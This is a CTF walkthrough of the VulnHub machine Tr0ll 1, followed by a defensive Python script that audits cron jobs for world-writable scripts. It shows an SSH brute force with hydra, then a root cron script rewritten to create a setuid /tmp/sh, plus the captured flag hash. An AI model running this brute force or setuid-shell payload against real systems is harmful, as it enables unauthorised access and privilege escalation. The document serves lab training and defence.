Walkthrough-TR0LL 1

Published: 2023-05-31 13:34:19  Author: Jarwu

0x01 Environment

Target VM:
https://www.vulnhub.com/entry/tr0ll-1,100/

This machine is CTF-style.

0x02 Process

1. Information gathering

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# netdiscover -r 192.168.60.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                             
                                                                                                                           
 9 Captured ARP Req/Rep packets, from 9 hosts.   Total size: 540                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.60.155  00:0c:29:54:74:4f      1      60  VMware, Inc.                                                            

Found the IP: 192.168.60.155

Open ports

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# nmap --min-rate 10000 -p- 192.168.60.155 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-30 22:16 EDT
Nmap scan report for troll (192.168.60.155)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:54:74:4F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds

2. Approach

FTP is open, so check FTP first.

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.60.155
Connected to 192.168.60.155.
220 (vsFTPd 3.0.2)
Name (192.168.60.155:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||38638|).
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||28826|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |********************************************************************************|  8068        3.27 MiB/s    00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (2.50 MiB/s)
ftp> exit
221 Goodbye.

We find lol.pcap. Opening it in Wireshark shows a file secret_stuff.txt in the traffic, together with its contents.

It reveals a path: sup3rs3cr3tdirlol

Opening port 80 in a browser: very CTF.

Browsing to that path reveals a file named roflmao.

Download it and inspect its strings.

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# strings roflmao                    
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed

The string "Find address 0x0856BF to proceed" gives us a new path: 0x0856BF

This yields a file of usernames:


maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow

And a password file

From the hint, the password should be the filename itself: Pass.txt (a gripe: this is what CTF is like).
Brute-force SSH with it:

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# hydra -L user.lst -p 'Pass.txt' 192.168.60.155 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-30 23:01:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://192.168.60.155:22/
[22][ssh] host: 192.168.60.155   login: overflow   password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-30 23:01:46

A valid credential pair:

overflow:Pass.txt

Log in over SSH

┌──(kali㉿kali)-[~]
└─$ ssh overflow@192.168.60.155
The authenticity of host '192.168.60.155 (192.168.60.155)' can't be established.
ED25519 key fingerprint is SHA256:jhpbgUldAKI9YAJOKhJZe9ypYt7GlEKUKU2WQ+zZBSs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.155' (ED25519) to the list of known hosts.
overflow@192.168.60.155's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$ 

Privilege escalation

Look for world-writable files

$ find / -perm -0002 -type f -print 2>/dev/null | grep -v /proc/
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/8.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()
$ cat /var/log/cronlog 
*/2 * * * * cleaner.py

There is a world-writable file, /lib/log/cleaner.py, and /var/log/cronlog shows a scheduled task that runs it every 2 minutes.
Because the cron job runs as root, whatever that script does runs as root.

Next comes privilege escalation through the cron job.

$ vim /lib/log/cleaner.py

$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('cp /bin/sh /tmp/sh && chmod 4777 /tmp/sh')
except:
        sys.exit()

$ /tmp/sh
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc
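As an added, defender-side example (not part of the original walkthrough): a small Python audit that flags the misconfiguration exploited above, a cron command whose script can be modified by group or world. The crontab text, directory layout and file names are constructed in a temporary directory to mirror the box; no real system paths are touched.

```python
import os
import stat
import tempfile


def parse_cron_commands(text):
    """Yield the command field of each crontab line (5 time fields + command); skip comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield parts[5]


def writable_by_others(path):
    """True if group or world has write permission on the file (the cleaner.py case)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(cron_text, search_dirs):
    """Return (command, path) pairs whose script unprivileged users can edit."""
    # A bare program name (as in '*/2 * * * * cleaner.py') is resolved
    # against search_dirs the way cron's PATH would resolve it.
    findings = []
    for cmd in parse_cron_commands(cron_text):
        prog = cmd.split()[0]
        paths = [prog] if os.path.isabs(prog) else [os.path.join(d, prog) for d in search_dirs]
        for path in paths:
            if os.path.isfile(path):
                if writable_by_others(path):
                    findings.append((cmd, path))
                break
    return findings


def demo():
    """Constructed layout mirroring the box: one world-writable cron script, one sane one."""
    libdir = os.path.join(tempfile.mkdtemp(), "lib", "log")
    os.makedirs(libdir)
    bad = os.path.join(libdir, "cleaner.py")
    good = os.path.join(libdir, "rotate.sh")
    with open(bad, "w") as fh:
        fh.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/*')\n")
    with open(good, "w") as fh:
        fh.write("#!/bin/sh\ntrue\n")
    os.chmod(bad, 0o777)   # the misconfiguration from the walkthrough
    os.chmod(good, 0o755)  # owner-only write: not flagged
    cron = "*/2 * * * * cleaner.py\n0 3 * * * rotate.sh\n"
    return audit_cron(cron, [libdir])
```

Run the same audit against the real system's crontabs (system crontab, /etc/cron.d, per-user crontabs) and cron's PATH to catch scripts that a non-root user can rewrite before root executes them.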